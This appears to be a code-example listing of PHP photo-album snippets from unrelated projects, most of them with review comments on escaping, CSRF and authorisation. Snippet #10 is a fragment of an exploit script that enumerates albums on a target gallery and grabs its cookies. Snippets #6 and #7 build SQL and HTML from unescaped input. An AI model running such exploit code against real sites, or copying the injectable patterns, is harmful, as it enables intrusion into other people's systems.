示例#1
/**
 * Assemble the HTML for the photo grid of the album returned by getAlbum().
 *
 * Despite the name, nothing is printed: the markup is returned to the caller.
 * The buildTextBox($album) call that used to sit between the opening wrapper
 * and the photos was already disabled in the original and stays out.
 *
 * @return string Wrapper markup with the output of getAlbumPhotos() inside it.
 */
function printPhotoGrid()
{
    $wrapperOpen = "<div id='welcome'>\n                    <div class='container-fluid clearfix' style='padding:0; overflow:hidden'>\n                        <div id='ib-main-wrapper' style='height:auto;' class='ib-main-wrapper'>\n                            <div class='ib-main'>";
    $wrapperClose = "<div class='clr'></div></div></div></div></div>";

    $currentAlbum = getAlbum();

    // NOTE(review): whatever getAlbumPhotos() returns is concatenated as-is, so any
    // HTML escaping of album or photo fields has to happen inside that helper,
    // which is not visible here.
    return $wrapperOpen . getAlbumPhotos($currentAlbum) . $wrapperClose;
}
示例#2
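/**
 * Move an album one position down by swapping `OrderID` with the next album.
 *
 * The "next" album is the row of `mbg_albums` with the smallest `OrderID`
 * greater than this album's. Nothing happens when the album does not exist,
 * when no album follows it, or when the lookup query fails.
 *
 * @param int|string $album_id ID of the album to move; used as an integer in SQL.
 * @return void
 */
function moveAlbumDOWN($album_id)
{
    if (!albumExists($album_id)) {
        return;
    }

    // Current album
    $album = getAlbum($album_id);

    // Every value below is interpolated into an unquoted numeric position of a
    // hand-built SQL string, so each one is forced to an integer first. Without
    // the cast, a caller-supplied $album_id would become part of the statement.
    // NOTE(review): ext/mysql has no bound parameters and was removed in PHP 7.0;
    // moving to mysqli/PDO prepared statements needs the connection handle, which
    // is not visible from this function.
    $albumIdSql = (int) $album_id;
    $orderIdSql = (int) $album['OrderID'];

    // Nearest album after the current one
    $q0 = mysql_query("SELECT * FROM `mbg_albums` WHERE `OrderID` > {$orderIdSql} AND `AlbumID` <> {$albumIdSql} ORDER BY `OrderID` ASC LIMIT 0,1");

    // mysql_query() returns false on failure; do not hand that to mysql_num_rows().
    if (!$q0 || !mysql_num_rows($q0)) {
        return;
    }

    $r0 = mysql_fetch_array($q0);
    $neighbourIdSql = (int) $r0['AlbumID'];
    $neighbourOrderSql = (int) $r0['OrderID'];

    // NOTE(review): the swap is two independent UPDATEs; nothing visible here makes
    // them atomic, so a failure between them leaves two albums with the same OrderID.
    mysql_query("UPDATE `mbg_albums` SET `OrderID` = {$neighbourOrderSql} WHERE `AlbumID` = {$albumIdSql}");
    mysql_query("UPDATE `mbg_albums` SET `OrderID` = {$orderIdSql} WHERE `AlbumID` = {$neighbourIdSql}");
}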
示例#3
    }
});
// GET /track/@id/edit: render the edit form for one track inside the site layout,
// or send the visitor back when the track lookup reports an error.
Flight::route('GET /track/@id/edit', function ($id) {
    $req = Flight::request();
    $decoded = json_decode(getTrack($id));

    if (isset($decoded->error)) {
        // NOTE(review): the redirect target is the Referer request header, which
        // the client supplies and may omit; a fixed in-app fallback URL would be
        // more predictable.
        Flight::redirect($req->referrer);
        return;
    }

    Flight::render('editTRack', array('track' => $decoded), 'body_content');
    // NOTE(review): the track title is concatenated into the page title as-is;
    // whether the 'layout' template escapes 'Titre' is not visible here.
    $pageTitle = 'Modifier le track ' . $decoded[0]->title;
    Flight::render('layout', array('Titre' => $pageTitle));
});
Flight::route('GET|POST /album/@id/edit', function ($id) {
    $request = Flight::request();
    if ($request->method == "GET") {
        $album = json_decode(getAlbum($id));
        if (!isset($album->error)) {
            Flight::render('editAlbum', array('album' => $album), 'body_content');
            Flight::render('layout', array('Titre' => 'Modifier un track à ' . $album[0]->title));
        } else {
            Flight::redirect($request->referrer);
        }
    } else {
        if ($request->method == "POST") {
            $album = json_encode($_POST);
            $result = json_decode(editAlbum($album));
            if (isset($result->ID)) {
                Flight::redirect($request->referrer);
            } else {
                Flight::redirect('http://localhost/php/App/playlists');
            }
示例#4
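<?php
// Delete one album and redirect to the page of the event it belonged to.
// Responds 400 (no id), 403 (caller may not edit the album), 404 (no such album)
// or 500 (delete failed) with an empty body; on success it redirects.
require_once('session_check.php');

if (!isset($_GET["id"])) {
  http_response_code(400);
  exit();
}

require_once("album.php");
$owners = getAlbumAllowedEditors($_GET["id"]);

// Authorisation comes before the existence check, and in_array() runs in strict
// mode so the session id must match an allowed editor by type as well as value.
if (!isset($_SESSION["id"]) || !in_array($_SESSION["id"], $owners, TRUE)) {
  http_response_code(403);
  exit();
}

if (!existsAlbum($_GET["id"])) {
  http_response_code(404);
  exit();
}

// Read the row before deleting it: its event id is needed for the redirect.
$album = getAlbum($_GET["id"]);

// NOTE(review): this is a state-changing request driven by a GET parameter, and
// no anti-CSRF token check is visible in this script (session_check.php is not
// shown). Consider accepting POST only and verifying a per-session token.
$deleted = deleteAlbum($_GET["id"]);
if (!$deleted) {
  http_response_code(500);
  exit;
}

// The var_dump($deleted) debug output was removed: it wrote to the response body
// before the status and Location headers were set, which stops them from being
// sent unless output buffering is on. The explicit 200 is gone as well, because
// sending a Location header makes PHP answer with a 302 anyway.
header("Location: ../event.php?id=" . urlencode((string) $album["eid"]));
?>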
示例#5
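<?php
// Add an uploaded photo to an album and answer with the album's image list as JSON.
require_once('session_check.php');
require_once("album.php");

// Both parts of the request are required. The original read them unchecked, so a
// request without the file part still reached addAlbumPhoto() with a null upload.
$albumId = isset($_POST["albumId"]) ? $_POST["albumId"] : null;
$upload = isset($_FILES["albumImage"]) ? $_FILES["albumImage"] : null;

if ($albumId === null || $upload === null || !existsAlbum($albumId)) {
  // Kept from the original: a 400 followed by a Location header. PHP turns the
  // response into a 302 once Location is sent, so clients see a redirect.
  http_response_code(400);
  header("Location: ../index.php");
  exit();
}

// NOTE(review): nothing here checks that the logged-in user may edit this album;
// session_check.php is not shown, so confirm it covers per-album permissions.
// NOTE(review): the upload's error code, size and content type are not inspected
// in this script; presumably addAlbumPhoto() validates the file, so verify there.
addAlbumPhoto($albumId, $upload);

http_response_code(200);
// The original guarded this with if(1), which made the redirect to
// ../manageAlbums.php?eid=... unreachable; only the JSON answer is kept.
// NOTE(review): no Content-Type is set, so the JSON goes out under PHP's default
// type; check what the client expects before switching to application/json.
echo json_encode(getAlbumImages(getAlbum($albumId)));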
示例#6
                mysql_query("UPDATE `mbg_albums` SET `Thumbnail3Size` = '{$size3['0']}x{$size3['1']}' WHERE `AlbumID` = '{$last_id}'");
            }
        }
    }
}
// Start Uploading Files
if ($upload_image = $_FILES['upload_image']) {
    $album_id = $_GET['album_id'];
    $allowed_file_types = array("jpg", "png", "jpeg", "gif");
    $file_name = $upload_image['name'];
    $file_type = strtolower(end(explode(".", $file_name)));
    $file_tmp = $upload_image['tmp_name'];
    $path_to_upload_files = $images_path;
    if (in_array($file_type, $allowed_file_types)) {
        if (albumExists($album_id)) {
            $album = getAlbum($album_id);
            // Generate Name
            switch (strtolower($naming)) {
                case "hash":
                case "random":
                    $new_name = substr(time(), 5) . '_' . substr(md5(time() + rand(1000, 9999)), 0, 6) . '_' . substr(sha1(time() + rand(1000, 9999)), 0, 6) . '.' . $file_type;
                    break;
                case "normal":
                    $new_name = $file_name;
                    break;
                default:
                    $new_name = str_replace(array(',', "'", '"'), '-', strtolower($file_name));
            }
            $album_path = $path_to_upload_files . 'album_' . $album_id . '/';
            $upload_file_path = $album_path . $new_name;
            if (!file_exists($album_path)) {
<?php

$id = $_GET['id'];
if (albumExists($id)) {
    $album = getAlbum($id);
    $images = getAlbumImages($id);
    ?>
<script type="text/javascript" src="js/album_manage.js"></script>
<a href="?action=album&id=<?php 
    echo $id;
    ?>
&edit" class="button" title="Click to edit">Album: <strong><?php 
    echo $album['AlbumName'];
    ?>
</strong></a>
<div class="separator"></div>
<h1>Manage Album</h1>
<?php 
    if (isset($_GET['edit'])) {
        include "edit_album.php";
    }
    ?>
<form action="" method="post" enctype="multipart/form-data" name="form1">
  <input type="hidden" name="album_id" id="album_id" value="<?php 
    echo $album['AlbumID'];
    ?>
">
  <input type="file" name="upload_image" id="upload_image" class="button">
</form>

<?php 
示例#8
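 /**
  * REST wrapper to the SOAP's getAlbum function.  This returns the discography
  * for a single album.  Please note that the entry-point can parse 'album' into
  * albumName and albumYear if 'album' is provided in the normal LyricWiki page
  * title format (such as "Pink Floyd" for 'artist' and "Dark Side Of The Moon (1973)" for
  * 'album').
  *
  * The result is printed, not returned. $fmt selects the output format:
  * 'php' prints serialize() output, 'text' goes through dumpText(), 'json' and
  * 'realjson' go through writeRealJSON(); an empty value, 'html', 'xml' (not
  * implemented yet) and anything else produce an HTML fragment.
  *
  * @param string $artist    Artist name, passed to getAlbum() and used in links.
  * @param string $albumName Album name passed to getAlbum().
  * @param string $albumYear Album year passed to getAlbum().
  * @param string $fmt       Output format; falls back to 'html' when empty.
  * @return void
  */
 function rest_getAlbum($artist, $albumName, $albumYear, $fmt)
 {
     wfProfileIn(__METHOD__);
     if (empty($fmt)) {
         $fmt = 'html';
     }
     $result = getAlbum($artist, $albumName, $albumYear);
     switch ($fmt) {
         case 'php':
             print serialize($result);
             break;
         case 'text':
             $this->dumpText($result);
             break;
         case 'json':
         case 'realjson':
             $this->writeRealJSON($result);
             break;
         case 'xml':
             // TODO: IMPLEMENT (until then 'xml' falls through to the HTML output)
         case 'html':
         default:
             $albumName = getVal($result, 'album');
             $year = getVal($result, 'year');
             $amznLink = getVal($result, 'amazonLink');
             $songs = getVal($result, 'songs');
             $yearSuffix = ($year == "" ? "" : "_({$year})");

             // Album, song and link values are written into element text and
             // quoted attributes, so they are HTML-escaped first. Nothing visible
             // here shows getAlbum() returning markup; double_encode is off so
             // entities that are already encoded are left alone. Link targets
             // still get the raw values because linkEncode() does its own encoding.
             $albumLabel = htmlspecialchars((string) $albumName . $yearSuffix, ENT_QUOTES, 'UTF-8', false);
             print "<a href='{$this->root}" . $this->linkEncode("{$artist}:{$albumName}" . $yearSuffix) . "'>{$albumLabel}</a>";
             if ($amznLink != "") {
                 $amznHref = htmlspecialchars((string) $amznLink, ENT_QUOTES, 'UTF-8', false);
                 $albumTitle = htmlspecialchars((string) $albumName, ENT_QUOTES, 'UTF-8', false);
                 print " - (at <a href='{$amznHref}' title=\"{$albumTitle} at amazon\">amazon</a>)";
             }
             // count() on a non-array warns or throws on current PHP versions, so
             // the list is only rendered when 'songs' really is an array.
             if (is_array($songs) && count($songs) > 0) {
                 print "<ul class='songs'>\n";
                 foreach ($songs as $currSong) {
                     $songLabel = htmlspecialchars((string) $currSong, ENT_QUOTES, 'UTF-8', false);
                     // A song that already contains ':' is treated as a full
                     // "Artist:Song" title; otherwise the artist is prefixed.
                     if (strpos($currSong, ":") !== false) {
                         print "<li><a href='{$this->root}" . $this->linkEncode($currSong) . "'>{$songLabel}</a></li>\n";
                     } else {
                         print "<li><a href='{$this->root}" . $this->linkEncode("{$artist}:{$currSong}") . "'>{$songLabel}</a></li>\n";
                     }
                 }
                 print "</ul>\n";
             }
             // NOTE(review): this closes an <li> that is not opened anywhere in
             // this method; presumably the caller opens it, so confirm.
             print "</li>\n";
             break;
     }
     wfProfileOut(__METHOD__);
 }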
示例#9
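<?php
// Prologue of the album view page: validate the id, load the album row, its event
// id and its images, then hand over to the HTML template below.
session_start();
require_once("database/album.php");

// 400 when no album id was supplied.
if (!isset($_GET['id'])) {
  http_response_code(400);
  ?><p> No album was specified </p><?php
  exit;
}

// 404 when the id does not match an album.
if (!existsAlbum($_GET['id'])) {
  http_response_code(404);
  ?><p> The album does not exist in the server </p><?php
  exit;
}

// One lookup serves both the row and the event id; the original called
// getAlbum() a second time just to read 'eid'.
$album = getAlbum($_GET['id']);
$eventId = intval($album['eid']);
$albumImages = getAlbumImages($album);

// NOTE(review): nothing in this prologue checks who is asking; confirm albums are
// meant to be viewable by anyone who knows the id.
// NOTE(review): the template below echoes $album['nome'] without
// htmlspecialchars(); album fields should be escaped where they are printed.
?>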

<!DOCTYPE html>
<html>
  <head>
    <?require_once('includes.php');?>
    <script type="text/javascript" src="scripts/view_album.js"></script>
    <link rel="stylesheet" type="text/css" href="stylesheets/album.css" >

  </head>
  <body>
    <?require_once('templates/header.php');?>
    <section id="album">
    <h1> <?echo $album['nome'];?></h1>
示例#10
        $sn++;
        if ($sn > 32) {
            return;
        }
    }
}
###############################################################
## START     E X P L O I T    C O D E
#############################################################
echo '
Exploiting:
[+] target: ' . $argv[1] . '/' . $argv[2] . '
';
$page = '';
$firstReply = sendit($page, 'GET');
$album = getAlbum($firstReply);
### get valid album number
if ($album == 0) {
    echo "[-] No valid album found...\n";
    if ($argv[3] != 0) {
        echo "... Forcing\n";
        $album = $argv[3];
    } else {
        credits();
    }
}
$page = 'thumbnails.php?album=' . $album;
$GLOBALS['album'] = $album;
echo "[+] Valid album number: " . $album . "\n";
$GLOBALS['cookies'] = getCookie($firstReply);
### get cookie from host
示例#11
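<?php
// Remove one image from an album. Responds 400 (missing parameters), 403 (caller
// may not edit the album), 404 (album unknown or image not in it), 500 (a delete
// failed) or 200, always with an empty body.
require_once('session_check.php');

if (!isset($_POST["aid"]) || !isset($_POST["iid"])) {
  http_response_code(400);
  exit();
}

require_once("album.php");
$owners = getAlbumAllowedEditors($_POST["aid"]);
// NOTE(review): $album is not used in the visible part of this script and is
// loaded before the existence check; kept in case later code relies on it.
$album = getAlbum($_POST["aid"]);

// in_array() runs in strict mode, so the session id must match an allowed editor
// by type as well as value.
if (!isset($_SESSION["id"]) || !in_array($_SESSION["id"], $owners, TRUE)) {
  http_response_code(403);
  exit();
}

// The image must belong to the album the caller was authorised for, otherwise an
// editor of one album could delete images of another.
if (!existsAlbum($_POST["aid"]) || !imageInAlbum($_POST["iid"], $_POST["aid"])) {
  http_response_code(404);
  exit();
}

require("connect.php");
// Both statements bind the request values through placeholders.
$stmt2 = $db->prepare("DELETE FROM ImageAlbum WHERE iid=? and aid=?");
$res2 = $stmt2->execute(array($_POST["iid"], $_POST["aid"]));
// NOTE(review): the Image row is removed even if other albums still reference it,
// and the two deletes are not wrapped in a transaction; confirm both are intended.
$stmt = $db->prepare('DELETE FROM Image WHERE iid=?');
$res = $stmt->execute(array($_POST["iid"]));

if (!$res || !$res2) {
  // The var_dump($_POST["iid"]) debug output was removed: error responses should
  // not echo request data back; record the failure server-side instead.
  http_response_code(500);
  exit;
}
// NOTE(review): no anti-CSRF token check is visible in this script
// (session_check.php is not shown); confirm one exists for this POST.
http_response_code(200);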